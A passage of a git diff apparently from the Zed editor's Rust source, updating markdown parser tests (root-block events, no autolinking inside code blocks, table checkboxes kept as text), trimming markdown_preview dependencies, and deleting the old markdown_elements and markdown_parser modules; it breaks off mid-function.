Start(CodeBlock { @@ -703,19 +846,22 @@ mod tests { ), (8..34, Text), (0..37, End(MarkdownTagEnd::CodeBlock)), + (0..37, RootEnd(0)), ], - { + language_names: { let mut h = HashSet::default(); h.insert("rust".into()); h }, - HashSet::default() - ) + root_block_starts: vec![0], + ..Default::default() + } ); assert_eq!( - parse_markdown(" fn main() {}"), - ( - vec![ + parse_markdown_with_options(" fn main() {}", false), + ParsedMarkdownData { + events: vec![ + (4..16, RootStart), ( 4..16, Start(CodeBlock { @@ -727,12 +873,126 @@ mod tests { }) ), (4..16, Text), - (4..16, End(MarkdownTagEnd::CodeBlock)) + (4..16, End(MarkdownTagEnd::CodeBlock)), + (4..16, RootEnd(0)), ], - HashSet::default(), - HashSet::default() - ) + root_block_starts: vec![4], + ..Default::default() + } + ); + } + + fn assert_code_block_does_not_emit_links(markdown: &str) { + let parsed = parse_markdown_with_options(markdown, false); + let mut code_block_depth = 0; + let mut code_block_count = 0; + let mut saw_text_inside_code_block = false; + + for (_, event) in &parsed.events { + match event { + Start(CodeBlock { .. }) => { + code_block_depth += 1; + code_block_count += 1; + } + End(MarkdownTagEnd::CodeBlock) => { + assert!( + code_block_depth > 0, + "encountered a code block end without a matching start" + ); + code_block_depth -= 1; + } + Start(Link { .. }) | End(MarkdownTagEnd::Link) => { + assert_eq!( + code_block_depth, 0, + "code blocks should not emit link events" + ); + } + Text | SubstitutedText(_) if code_block_depth > 0 => { + saw_text_inside_code_block = true; + } + _ => {} + } + } + + assert_eq!(code_block_count, 1, "expected exactly one code block"); + assert_eq!(code_block_depth, 0, "unterminated code block"); + assert!( + saw_text_inside_code_block, + "expected text inside the code block" + ); + } + + #[test] + fn test_code_blocks_do_not_autolink_urls() { + assert_code_block_does_not_emit_links("```txt\nhttps://example.com\n```"); + assert_code_block_does_not_emit_links(" https://example.com"); + assert_code_block_does_not_emit_links( + "```txt\r\nhttps:/\\/example.com\r\nhttps://example.com\r\n```", ); + assert_code_block_does_not_emit_links( + " https:/\\/example.com\r\n https://example.com", + ); + } + + #[test] + fn test_metadata_blocks_do_not_affect_root_blocks() { + assert_eq!( + parse_markdown_with_options("+++\ntitle = \"Example\"\n+++\n\nParagraph", false), + ParsedMarkdownData { + events: vec![ + (27..36, RootStart), + (27..36, Start(Paragraph)), + (27..36, Text), + (27..36, End(MarkdownTagEnd::Paragraph)), + (27..36, RootEnd(0)), + ], + root_block_starts: vec![27], + ..Default::default() + } + ); + } + + #[test] + fn test_table_checkboxes_remain_text_in_cells() { + let markdown = "\ +| Done | Task | +|------|---------| +| [x] | Fix bug | +| [ ] | Add feature |"; + let parsed = parse_markdown_with_options(markdown, false); + + let mut in_table = false; + let mut saw_task_list_marker = false; + let mut cell_texts = Vec::new(); + let mut current_cell = String::new(); + + for (range, event) in &parsed.events { + match event { + Start(Table(_)) => in_table = true, + End(MarkdownTagEnd::Table) => in_table = false, + Start(TableCell) => current_cell.clear(), + End(MarkdownTagEnd::TableCell) => { + if in_table { + cell_texts.push(current_cell.clone()); + } + } + Text if in_table => current_cell.push_str(&markdown[range.clone()]), + TaskListMarker(_) if in_table => saw_task_list_marker = true, + _ => {} + } + } + + let checkbox_cells: Vec<&str> = cell_texts + .iter() + .map(|cell| cell.trim()) + .filter(|cell| *cell == "[x]" || *cell == "[X]" || *cell == "[ ]") + .collect(); + + assert!( + !saw_task_list_marker, + "Table checkboxes should remain text, not task-list markers" + ); + assert_eq!(checkbox_cells, vec!["[x]", "[ ]"]); } #[test] @@ -776,8 +1036,13 @@ mod tests { // Note: In real usage, pulldown_cmark creates separate text events for the escaped character // We're verifying our parser can handle this correctly assert_eq!( - parse_markdown("https:/\\/example.com is equivalent to https://example.com!").0, + parse_markdown_with_options( + "https:/\\/example.com is equivalent to https://example.com!", + false + ) + .events, vec![ + (0..62, RootStart), (0..62, Start(Paragraph)), ( 0..20, @@ -806,13 +1071,19 @@ mod tests { (58..61, Text), (38..61, End(MarkdownTagEnd::Link)), (61..62, Text), - (0..62, End(MarkdownTagEnd::Paragraph)) + (0..62, End(MarkdownTagEnd::Paragraph)), + (0..62, RootEnd(0)), ], ); assert_eq!( - parse_markdown("Visit https://example.com/cat\\/é‍☕ for coffee!").0, + parse_markdown_with_options( + "Visit https://example.com/cat\\/é‍☕ for coffee!", + false + ) + .events, [ + (0..55, RootStart), (0..55, Start(Paragraph)), (0..6, Text), ( @@ -830,7 +1101,8 @@ mod tests { (40..43, Text), (6..43, End(MarkdownTagEnd::Link)), (43..55, Text), - (0..55, End(MarkdownTagEnd::Paragraph)) + (0..55, End(MarkdownTagEnd::Paragraph)), + (0..55, RootEnd(0)), ] ); } diff --git a/crates/markdown_preview/Cargo.toml b/crates/markdown_preview/Cargo.toml index 1cfc1b4e59ef14b47ab5845dc67e2ad77c9232e5..3a07b258c5bd17ef2da02820ef2e724f7389ce13 100644 --- a/crates/markdown_preview/Cargo.toml +++ b/crates/markdown_preview/Cargo.toml @@ -16,28 +16,19 @@ test-support = [] [dependencies] anyhow.workspace = true -async-recursion.workspace = true -collections.workspace = true -crashes.workspace = true editor.workspace = true -fs.workspace = true gpui.workspace = true -html5ever.workspace = true language.workspace = true -linkify.workspace = true log.workspace = true -markup5ever_rcdom.workspace = true -pretty_assertions.workspace = true -pulldown-cmark.workspace = true +markdown.workspace = true +project.workspace = true settings.workspace = true -theme.workspace = true +theme_settings.workspace = true ui.workspace = true urlencoding.workspace = true util.workspace = true workspace.workspace = true zed_actions.workspace = true -mermaid-rs-renderer.workspace = true [dev-dependencies] -editor = { workspace = true, features = ["test-support"] } -language = { workspace = true, features = ["test-support"] } +tempfile.workspace = true diff --git a/crates/markdown_preview/src/markdown_elements.rs b/crates/markdown_preview/src/markdown_elements.rs deleted file mode 100644 index 1887da31621901fe7582192770018bd4e53a3c64..0000000000000000000000000000000000000000 --- a/crates/markdown_preview/src/markdown_elements.rs +++ /dev/null @@ -1,373 +0,0 @@ -use gpui::{ - DefiniteLength, FontStyle, FontWeight, HighlightStyle, SharedString, StrikethroughStyle, - UnderlineStyle, px, -}; -use language::HighlightId; -use std::{fmt::Display, ops::Range, path::PathBuf}; -use urlencoding; - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub enum ParsedMarkdownElement { - Heading(ParsedMarkdownHeading), - ListItem(ParsedMarkdownListItem), - Table(ParsedMarkdownTable), - BlockQuote(ParsedMarkdownBlockQuote), - CodeBlock(ParsedMarkdownCodeBlock), - MermaidDiagram(ParsedMarkdownMermaidDiagram), - /// A paragraph of text and other inline elements. - Paragraph(MarkdownParagraph), - HorizontalRule(Range), - Image(Image), -} - -impl ParsedMarkdownElement { - pub fn source_range(&self) -> Option> { - Some(match self { - Self::Heading(heading) => heading.source_range.clone(), - Self::ListItem(list_item) => list_item.source_range.clone(), - Self::Table(table) => table.source_range.clone(), - Self::BlockQuote(block_quote) => block_quote.source_range.clone(), - Self::CodeBlock(code_block) => code_block.source_range.clone(), - Self::MermaidDiagram(mermaid) => mermaid.source_range.clone(), - Self::Paragraph(text) => match text.get(0)? { - MarkdownParagraphChunk::Text(t) => t.source_range.clone(), - MarkdownParagraphChunk::Image(image) => image.source_range.clone(), - }, - Self::HorizontalRule(range) => range.clone(), - Self::Image(image) => image.source_range.clone(), - }) - } - - pub fn is_list_item(&self) -> bool { - matches!(self, Self::ListItem(_)) - } -} - -pub type MarkdownParagraph = Vec; - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub enum MarkdownParagraphChunk { - Text(ParsedMarkdownText), - Image(Image), -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdown { - pub children: Vec, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownListItem { - pub source_range: Range, - /// How many indentations deep this item is. - pub depth: u16, - pub item_type: ParsedMarkdownListItemType, - pub content: Vec, - /// Whether we can expect nested list items inside of this items `content`. - pub nested: bool, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub enum ParsedMarkdownListItemType { - Ordered(u64), - Task(bool, Range), - Unordered, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownCodeBlock { - pub source_range: Range, - pub language: Option, - pub contents: SharedString, - pub highlights: Option, HighlightId)>>, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownMermaidDiagram { - pub source_range: Range, - pub contents: ParsedMarkdownMermaidDiagramContents, -} - -#[derive(Clone, Debug, PartialEq, Eq, Hash)] -pub struct ParsedMarkdownMermaidDiagramContents { - pub contents: SharedString, - pub scale: u32, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownHeading { - pub source_range: Range, - pub level: HeadingLevel, - pub contents: MarkdownParagraph, -} - -#[derive(Debug, PartialEq)] -pub enum HeadingLevel { - H1, - H2, - H3, - H4, - H5, - H6, -} - -#[derive(Debug)] -pub struct ParsedMarkdownTable { - pub source_range: Range, - pub header: Vec, - pub body: Vec, - pub caption: Option, -} - -#[derive(Debug, Clone, Copy, Default)] -#[cfg_attr(test, derive(PartialEq))] -pub enum ParsedMarkdownTableAlignment { - #[default] - None, - Left, - Center, - Right, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownTableColumn { - pub col_span: usize, - pub row_span: usize, - pub is_header: bool, - pub children: MarkdownParagraph, - pub alignment: ParsedMarkdownTableAlignment, -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownTableRow { - pub columns: Vec, -} - -impl Default for ParsedMarkdownTableRow { - fn default() -> Self { - Self::new() - } -} - -impl ParsedMarkdownTableRow { - pub fn new() -> Self { - Self { - columns: Vec::new(), - } - } - - pub fn with_columns(columns: Vec) -> Self { - Self { columns } - } -} - -#[derive(Debug)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedMarkdownBlockQuote { - pub source_range: Range, - pub children: Vec, -} - -#[derive(Debug, Clone)] -pub struct ParsedMarkdownText { - /// Where the text is located in the source Markdown document. - pub source_range: Range, - /// The text content stripped of any formatting symbols. - pub contents: SharedString, - /// The list of highlights contained in the Markdown document. - pub highlights: Vec<(Range, MarkdownHighlight)>, - /// The regions of the Markdown document. - pub regions: Vec<(Range, ParsedRegion)>, -} - -/// A run of highlighted Markdown text. -#[derive(Debug, Clone, PartialEq, Eq)] -pub enum MarkdownHighlight { - /// A styled Markdown highlight. - Style(MarkdownHighlightStyle), - /// A highlighted code block. - Code(HighlightId), -} - -impl MarkdownHighlight { - /// Converts this [`MarkdownHighlight`] to a [`HighlightStyle`]. - pub fn to_highlight_style(&self, theme: &theme::SyntaxTheme) -> Option { - match self { - MarkdownHighlight::Style(style) => { - let mut highlight = HighlightStyle::default(); - - if style.italic { - highlight.font_style = Some(FontStyle::Italic); - } - - if style.underline { - highlight.underline = Some(UnderlineStyle { - thickness: px(1.), - ..Default::default() - }); - } - - if style.strikethrough { - highlight.strikethrough = Some(StrikethroughStyle { - thickness: px(1.), - ..Default::default() - }); - } - - if style.weight != FontWeight::default() { - highlight.font_weight = Some(style.weight); - } - - if style.link { - highlight.underline = Some(UnderlineStyle { - thickness: px(1.), - ..Default::default() - }); - } - - if style.oblique { - highlight.font_style = Some(FontStyle::Oblique) - } - - Some(highlight) - } - - MarkdownHighlight::Code(id) => id.style(theme), - } - } -} - -/// The style for a Markdown highlight. -#[derive(Debug, Clone, Default, PartialEq, Eq)] -pub struct MarkdownHighlightStyle { - /// Whether the text should be italicized. - pub italic: bool, - /// Whether the text should be underlined. - pub underline: bool, - /// Whether the text should be struck through. - pub strikethrough: bool, - /// The weight of the text. - pub weight: FontWeight, - /// Whether the text should be stylized as link. - pub link: bool, - // Whether the text should be obliqued. - pub oblique: bool, -} - -/// A parsed region in a Markdown document. -#[derive(Debug, Clone)] -#[cfg_attr(test, derive(PartialEq))] -pub struct ParsedRegion { - /// Whether the region is a code block. - pub code: bool, - /// The link contained in this region, if it has one. - pub link: Option, -} - -/// A Markdown link. -#[derive(Debug, Clone)] -#[cfg_attr(test, derive(PartialEq))] -pub enum Link { - /// A link to a webpage. - Web { - /// The URL of the webpage. - url: String, - }, - /// A link to a path on the filesystem. - Path { - /// The path as provided in the Markdown document. - display_path: PathBuf, - /// The absolute path to the item. - path: PathBuf, - }, -} - -impl Link { - pub fn identify(file_location_directory: Option, text: String) -> Option { - if text.starts_with("http") { - return Some(Link::Web { url: text }); - } - - // URL decode the text to handle spaces and other special characters - let decoded_text = urlencoding::decode(&text) - .map(|s| s.into_owned()) - .unwrap_or(text); - - let path = PathBuf::from(&decoded_text); - if path.is_absolute() && path.exists() { - return Some(Link::Path { - display_path: path.clone(), - path, - }); - } - - if let Some(file_location_directory) = file_location_directory { - let display_path = path; - let path = file_location_directory.join(decoded_text); - if path.exists() { - return Some(Link::Path { display_path, path }); - } - } - - None - } -} - -impl Display for Link { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - Link::Web { url } => write!(f, "{}", url), - Link::Path { display_path, .. } => write!(f, "{}", display_path.display()), - } - } -} - -/// A Markdown Image -#[derive(Debug, Clone)] -#[cfg_attr(test, derive(PartialEq))] -pub struct Image { - pub link: Link, - pub source_range: Range, - pub alt_text: Option, - pub width: Option, - pub height: Option, -} - -impl Image { - pub fn identify( - text: String, - source_range: Range, - file_location_directory: Option, - ) -> Option { - let link = Link::identify(file_location_directory, text)?; - Some(Self { - source_range, - link, - alt_text: None, - width: None, - height: None, - }) - } - - pub fn set_alt_text(&mut self, alt_text: SharedString) { - self.alt_text = Some(alt_text); - } - - pub fn set_width(&mut self, width: DefiniteLength) { - self.width = Some(width); - } - - pub fn set_height(&mut self, height: DefiniteLength) { - self.height = Some(height); - } -} diff --git a/crates/markdown_preview/src/markdown_parser.rs b/crates/markdown_preview/src/markdown_parser.rs deleted file mode 100644 index 59f18647d3ca8ac4937b2e411c8b9bb8e33550b7..0000000000000000000000000000000000000000 --- a/crates/markdown_preview/src/markdown_parser.rs +++ /dev/null @@ -1,3270 +0,0 @@ -use crate::{ - markdown_elements::*, - markdown_minifier::{Minifier, MinifierOptions}, -}; -use async_recursion::async_recursion; -use collections::FxHashMap; -use gpui::{DefiniteLength, FontWeight, px, relative}; -use html5ever::{ParseOpts, local_name, parse_document, tendril::TendrilSink}; -use language::LanguageRegistry; -use markup5ever_rcdom::RcDom; -use pulldown_cmark::{Alignment, Event, Options, Parser, Tag, TagEnd}; -use std::{ - cell::RefCell, collections::HashMap, mem, ops::Range, path::PathBuf, rc::Rc, sync::Arc, vec, -}; -use ui::SharedString; - -pub async fn parse_markdown( - markdown_input: &str, - file_location_directory: Option, - language_registry: Option>, -) -> ParsedMarkdown { - let mut options = Options::all(); - options.remove(pulldown_cmark::Options::ENABLE_DEFINITION_LIST); - - let parser = Parser::new_ext(markdown_input, options); - let parser = MarkdownParser::new( - parser.into_offset_iter().collect(), - file_location_directory, - language_registry, - ); - let renderer = parser.parse_document().await; - ParsedMarkdown { - children: renderer.parsed, - } -} - -fn cleanup_html(source: &str) -> Vec { - let mut writer = std::io::Cursor::new(Vec::new()); - let mut reader = std::io::Cursor::new(source); - let mut minify = Minifier::new( - &mut writer, - MinifierOptions { - omit_doctype: true, - collapse_whitespace: true, - ..Default::default() - }, - ); - if let Ok(()) = minify.minify(&mut reader) { - writer.into_inner() - } else { - source.bytes().collect() - } -} - -struct MarkdownParser<'a> { - tokens: Vec<(Event<'a>, Range)>, - /// The current index in the tokens array - cursor: usize, - /// The blocks that we have successfully parsed so far - parsed: Vec, - file_location_directory: Option, - language_registry: Option>, -} - -#[derive(Debug)] -struct ParseHtmlNodeContext { - list_item_depth: u16, -} - -impl Default for ParseHtmlNodeContext { - fn default() -> Self { - Self { list_item_depth: 1 } - } -} - -struct MarkdownListItem { - content: Vec, - item_type: ParsedMarkdownListItemType, -} - -impl Default for MarkdownListItem { - fn default() -> Self { - Self { - content: Vec::new(), - item_type: ParsedMarkdownListItemType::Unordered, - } - } -} - -impl<'a> MarkdownParser<'a> { - fn new( - tokens: Vec<(Event<'a>, Range)>, - file_location_directory: Option, - language_registry: Option>, - ) -> Self { - Self { - tokens, - file_location_directory, - language_registry, - cursor: 0, - parsed: vec![], - } - } - - fn eof(&self) -> bool { - if self.tokens.is_empty() { - return true; - } - self.cursor >= self.tokens.len() - 1 - } - - fn peek(&self, steps: usize) -> Option<&(Event<'_>, Range)> { - if self.eof() || (steps + self.cursor) >= self.tokens.len() { - return self.tokens.last(); - } - self.tokens.get(self.cursor + steps) - } - - fn previous(&self) -> Option<&(Event<'_>, Range)> { - if self.cursor == 0 || self.cursor > self.tokens.len() { - return None; - } - self.tokens.get(self.cursor - 1) - } - - fn current(&self) -> Option<&(Event<'_>, Range)> { - self.peek(0) - } - - fn current_event(&self) -> Option<&Event<'_>> { - self.current().map(|(event, _)| event) - } - - fn is_text_like(event: &Event) -> bool { - match event { - Event::Text(_) - // Represent an inline code block - | Event::Code(_) - | Event::Html(_) - | Event::InlineHtml(_) - | Event::FootnoteReference(_) - | Event::Start(Tag::Link { .. }) - | Event::Start(Tag::Emphasis) - | Event::Start(Tag::Strong) - | Event::Start(Tag::Strikethrough) - | Event::Start(Tag::Image { .. }) => { - true - } - _ => false, - } - } - - async fn parse_document(mut self) -> Self { - while !self.eof() { - if let Some(block) = self.parse_block().await { - self.parsed.extend(block); - } else { - self.cursor += 1; - } - } - self - } - - #[async_recursion] - async fn parse_block(&mut self) -> Option> { - let (current, source_range) = self.current().unwrap(); - let source_range = source_range.clone(); - match current { - Event::Start(tag) => match tag { - Tag::Paragraph => { - self.cursor += 1; - let text = self.parse_text(false, Some(source_range)); - Some(vec![ParsedMarkdownElement::Paragraph(text)]) - } - Tag::Heading { level, .. } => { - let level = *level; - self.cursor += 1; - let heading = self.parse_heading(level); - Some(vec![ParsedMarkdownElement::Heading(heading)]) - } - Tag::Table(alignment) => { - let alignment = alignment.clone(); - self.cursor += 1; - let table = self.parse_table(alignment); - Some(vec![ParsedMarkdownElement::Table(table)]) - } - Tag::List(order) => { - let order = *order; - self.cursor += 1; - let list = self.parse_list(order).await; - Some(list) - } - Tag::BlockQuote(_kind) => { - self.cursor += 1; - let block_quote = self.parse_block_quote().await; - Some(vec![ParsedMarkdownElement::BlockQuote(block_quote)]) - } - Tag::CodeBlock(kind) => { - let (language, scale) = match kind { - pulldown_cmark::CodeBlockKind::Indented => (None, None), - pulldown_cmark::CodeBlockKind::Fenced(language) => { - if language.is_empty() { - (None, None) - } else { - let parts: Vec<&str> = language.split_whitespace().collect(); - let lang = parts.first().map(|s| s.to_string()); - let scale = parts.get(1).and_then(|s| s.parse::().ok()); - (lang, scale) - } - } - }; - - self.cursor += 1; - - if language.as_deref() == Some("mermaid") { - let mermaid_diagram = self.parse_mermaid_diagram(scale).await?; - Some(vec![ParsedMarkdownElement::MermaidDiagram(mermaid_diagram)]) - } else { - let code_block = self.parse_code_block(language).await?; - Some(vec![ParsedMarkdownElement::CodeBlock(code_block)]) - } - } - Tag::HtmlBlock => { - self.cursor += 1; - - Some(self.parse_html_block().await) - } - _ => None, - }, - Event::Rule => { - self.cursor += 1; - Some(vec![ParsedMarkdownElement::HorizontalRule(source_range)]) - } - _ => None, - } - } - - fn parse_text( - &mut self, - should_complete_on_soft_break: bool, - source_range: Option>, - ) -> MarkdownParagraph { - let source_range = source_range.unwrap_or_else(|| { - self.current() - .map(|(_, range)| range.clone()) - .unwrap_or_default() - }); - - let mut markdown_text_like = Vec::new(); - let mut text = String::new(); - let mut bold_depth = 0; - let mut italic_depth = 0; - let mut strikethrough_depth = 0; - let mut link: Option = None; - let mut image: Option = None; - let mut regions: Vec<(Range, ParsedRegion)> = vec![]; - let mut highlights: Vec<(Range, MarkdownHighlight)> = vec![]; - let mut link_urls: Vec = vec![]; - let mut link_ranges: Vec> = vec![]; - - loop { - if self.eof() { - break; - } - - let (current, _) = self.current().unwrap(); - let prev_len = text.len(); - match current { - Event::SoftBreak => { - if should_complete_on_soft_break { - break; - } - text.push(' '); - } - - Event::HardBreak => { - text.push('\n'); - } - - // We want to ignore any inline HTML tags in the text but keep - // the text between them - Event::InlineHtml(_) => {} - - Event::Text(t) => { - text.push_str(t.as_ref()); - let mut style = MarkdownHighlightStyle::default(); - - if bold_depth > 0 { - style.weight = FontWeight::BOLD; - } - - if italic_depth > 0 { - style.italic = true; - } - - if strikethrough_depth > 0 { - style.strikethrough = true; - } - - let last_run_len = if let Some(link) = link.clone() { - regions.push(( - prev_len..text.len(), - ParsedRegion { - code: false, - link: Some(link), - }, - )); - style.link = true; - prev_len - } else { - // Manually scan for links - let mut finder = linkify::LinkFinder::new(); - finder.kinds(&[linkify::LinkKind::Url]); - let mut last_link_len = prev_len; - for link in finder.links(t) { - let start = prev_len + link.start(); - let end = prev_len + link.end(); - let range = start..end; - link_ranges.push(range.clone()); - link_urls.push(link.as_str().to_string()); - - // If there is a style before we match a link, we have to add this to the highlighted ranges - if style != MarkdownHighlightStyle::default() && last_link_len < start { - highlights.push(( - last_link_len..start, - MarkdownHighlight::Style(style.clone()), - )); - } - - highlights.push(( - range.clone(), - MarkdownHighlight::Style(MarkdownHighlightStyle { - underline: true, - ..style - }), - )); - - regions.push(( - range.clone(), - ParsedRegion { - code: false, - link: Some(Link::Web { - url: link.as_str().to_string(), - }), - }, - )); - last_link_len = end; - } - last_link_len - }; - - if style != MarkdownHighlightStyle::default() && last_run_len < text.len() { - let mut new_highlight = true; - if let Some((last_range, last_style)) = highlights.last_mut() - && last_range.end == last_run_len - && last_style == &MarkdownHighlight::Style(style.clone()) - { - last_range.end = text.len(); - new_highlight = false; - } - if new_highlight { - highlights.push(( - last_run_len..text.len(), - MarkdownHighlight::Style(style.clone()), - )); - } - } - } - Event::Code(t) => { - text.push_str(t.as_ref()); - let range = prev_len..text.len(); - - if link.is_some() { - highlights.push(( - range.clone(), - MarkdownHighlight::Style(MarkdownHighlightStyle { - link: true, - ..Default::default() - }), - )); - } - regions.push(( - range, - ParsedRegion { - code: true, - link: link.clone(), - }, - )); - } - Event::Start(tag) => match tag { - Tag::Emphasis => italic_depth += 1, - Tag::Strong => bold_depth += 1, - Tag::Strikethrough => strikethrough_depth += 1, - Tag::Link { dest_url, .. } => { - link = Link::identify( - self.file_location_directory.clone(), - dest_url.to_string(), - ); - } - Tag::Image { dest_url, .. } => { - if !text.is_empty() { - let parsed_regions = MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: source_range.clone(), - contents: mem::take(&mut text).into(), - highlights: mem::take(&mut highlights), - regions: mem::take(&mut regions), - }); - markdown_text_like.push(parsed_regions); - } - image = Image::identify( - dest_url.to_string(), - source_range.clone(), - self.file_location_directory.clone(), - ); - } - _ => { - break; - } - }, - - Event::End(tag) => match tag { - TagEnd::Emphasis => italic_depth -= 1, - TagEnd::Strong => bold_depth -= 1, - TagEnd::Strikethrough => strikethrough_depth -= 1, - TagEnd::Link => { - link = None; - } - TagEnd::Image => { - if let Some(mut image) = image.take() { - if !text.is_empty() { - image.set_alt_text(std::mem::take(&mut text).into()); - mem::take(&mut highlights); - mem::take(&mut regions); - } - markdown_text_like.push(MarkdownParagraphChunk::Image(image)); - } - } - TagEnd::Paragraph => { - self.cursor += 1; - break; - } - _ => { - break; - } - }, - _ => { - break; - } - } - - self.cursor += 1; - } - if !text.is_empty() { - markdown_text_like.push(MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range, - contents: text.into(), - highlights, - regions, - })); - } - markdown_text_like - } - - fn parse_heading(&mut self, level: pulldown_cmark::HeadingLevel) -> ParsedMarkdownHeading { - let (_event, source_range) = self.previous().unwrap(); - let source_range = source_range.clone(); - let text = self.parse_text(true, None); - - // Advance past the heading end tag - self.cursor += 1; - - ParsedMarkdownHeading { - source_range, - level: match level { - pulldown_cmark::HeadingLevel::H1 => HeadingLevel::H1, - pulldown_cmark::HeadingLevel::H2 => HeadingLevel::H2, - pulldown_cmark::HeadingLevel::H3 => HeadingLevel::H3, - pulldown_cmark::HeadingLevel::H4 => HeadingLevel::H4, - pulldown_cmark::HeadingLevel::H5 => HeadingLevel::H5, - pulldown_cmark::HeadingLevel::H6 => HeadingLevel::H6, - }, - contents: text, - } - } - - fn parse_table(&mut self, alignment: Vec) -> ParsedMarkdownTable { - let (_event, source_range) = self.previous().unwrap(); - let source_range = source_range.clone(); - let mut header = vec![]; - let mut body = vec![]; - let mut row_columns = vec![]; - let mut in_header = true; - let column_alignments = alignment - .iter() - .map(Self::convert_alignment) - .collect::>(); - - loop { - if self.eof() { - break; - } - - let (current, source_range) = self.current().unwrap(); - let source_range = source_range.clone(); - match current { - Event::Start(Tag::TableHead) - | Event::Start(Tag::TableRow) - | Event::End(TagEnd::TableCell) => { - self.cursor += 1; - } - Event::Start(Tag::TableCell) => { - self.cursor += 1; - let cell_contents = self.parse_text(false, Some(source_range)); - row_columns.push(ParsedMarkdownTableColumn { - col_span: 1, - row_span: 1, - is_header: in_header, - children: cell_contents, - alignment: column_alignments - .get(row_columns.len()) - .copied() - .unwrap_or_default(), - }); - } - Event::End(TagEnd::TableHead) | Event::End(TagEnd::TableRow) => { - self.cursor += 1; - let columns = std::mem::take(&mut row_columns); - if in_header { - header.push(ParsedMarkdownTableRow { columns: columns }); - in_header = false; - } else { - body.push(ParsedMarkdownTableRow::with_columns(columns)); - } - } - Event::End(TagEnd::Table) => { - self.cursor += 1; - break; - } - _ => { - break; - } - } - } - - ParsedMarkdownTable { - source_range, - header, - body, - caption: None, - } - } - - fn convert_alignment(alignment: &Alignment) -> ParsedMarkdownTableAlignment { - match alignment { - Alignment::None => ParsedMarkdownTableAlignment::None, - Alignment::Left => ParsedMarkdownTableAlignment::Left, - Alignment::Center => ParsedMarkdownTableAlignment::Center, - Alignment::Right => ParsedMarkdownTableAlignment::Right, - } - } - - async fn parse_list(&mut self, order: Option) -> Vec { - let (_, list_source_range) = self.previous().unwrap(); - - let mut items = Vec::new(); - let mut items_stack = vec![MarkdownListItem::default()]; - let mut depth = 1; - let mut order = order; - let mut order_stack = Vec::new(); - - let mut insertion_indices = FxHashMap::default(); - let mut source_ranges = FxHashMap::default(); - let mut start_item_range = list_source_range.clone(); - - while !self.eof() { - let (current, source_range) = self.current().unwrap(); - match current { - Event::Start(Tag::List(new_order)) => { - if items_stack.last().is_some() && !insertion_indices.contains_key(&depth) { - insertion_indices.insert(depth, items.len()); - } - - // We will use the start of the nested list as the end for the current item's range, - // because we don't care about the hierarchy of list items - if let collections::hash_map::Entry::Vacant(e) = source_ranges.entry(depth) { - e.insert(start_item_range.start..source_range.start); - } - - order_stack.push(order); - order = *new_order; - self.cursor += 1; - depth += 1; - } - Event::End(TagEnd::List(_)) => { - order = order_stack.pop().flatten(); - self.cursor += 1; - depth -= 1; - - if depth == 0 { - break; - } - } - Event::Start(Tag::Item) => { - start_item_range = source_range.clone(); - - self.cursor += 1; - items_stack.push(MarkdownListItem::default()); - - let mut task_list = None; - // Check for task list marker (`- [ ]` or `- [x]`) - if let Some(event) = self.current_event() { - // If there is a linebreak in between two list items the task list marker will actually be the first element of the paragraph - if event == &Event::Start(Tag::Paragraph) { - self.cursor += 1; - } - - if let Some((Event::TaskListMarker(checked), range)) = self.current() { - task_list = Some((*checked, range.clone())); - self.cursor += 1; - } - } - - if let Some((event, range)) = self.current() { - // This is a plain list item. - // For example `- some text` or `1. [Docs](./docs.md)` - if MarkdownParser::is_text_like(event) { - let text = self.parse_text(false, Some(range.clone())); - let block = ParsedMarkdownElement::Paragraph(text); - if let Some(content) = items_stack.last_mut() { - let item_type = if let Some((checked, range)) = task_list { - ParsedMarkdownListItemType::Task(checked, range) - } else if let Some(order) = order { - ParsedMarkdownListItemType::Ordered(order) - } else { - ParsedMarkdownListItemType::Unordered - }; - content.item_type = item_type; - content.content.push(block); - } - } else { - let block = self.parse_block().await; - if let Some(block) = block - && let Some(list_item) = items_stack.last_mut() - { - list_item.content.extend(block); - } - } - } - - // If there is a linebreak in between two list items the task list marker will actually be the first element of the paragraph - if self.current_event() == Some(&Event::End(TagEnd::Paragraph)) { - self.cursor += 1; - } - } - Event::End(TagEnd::Item) => { - self.cursor += 1; - - if let Some(current) = order { - order = Some(current + 1); - } - - if let Some(list_item) = items_stack.pop() { - let source_range = source_ranges - .remove(&depth) - .unwrap_or(start_item_range.clone()); - - // We need to remove the last character of the source range, because it includes the newline character - let source_range = source_range.start..source_range.end - 1; - let item = ParsedMarkdownElement::ListItem(ParsedMarkdownListItem { - source_range, - content: list_item.content, - depth, - item_type: list_item.item_type, - nested: false, - }); - - if let Some(index) = insertion_indices.get(&depth) { - items.insert(*index, item); - insertion_indices.remove(&depth); - } else { - items.push(item); - } - } - } - _ => { - if depth == 0 { - break; - } - // This can only happen if a list item starts with more then one paragraph, - // or the list item contains blocks that should be rendered after the nested list items - let block = self.parse_block().await; - if let Some(block) = block { - if let Some(list_item) = items_stack.last_mut() { - // If we did not insert any nested items yet (in this case insertion index is set), we can append the block to the current list item - if !insertion_indices.contains_key(&depth) { - list_item.content.extend(block); - continue; - } - } - - // Otherwise we need to insert the block after all the nested items - // that have been parsed so far - items.extend(block); - } else { - self.cursor += 1; - } - } - } - } - - items - } - - #[async_recursion] - async fn parse_block_quote(&mut self) -> ParsedMarkdownBlockQuote { - let (_event, source_range) = self.previous().unwrap(); - let source_range = source_range.clone(); - let mut nested_depth = 1; - - let mut children: Vec = vec![]; - - while !self.eof() { - let block = self.parse_block().await; - - if let Some(block) = block { - children.extend(block); - } else { - break; - } - - if self.eof() { - break; - } - - let (current, _source_range) = 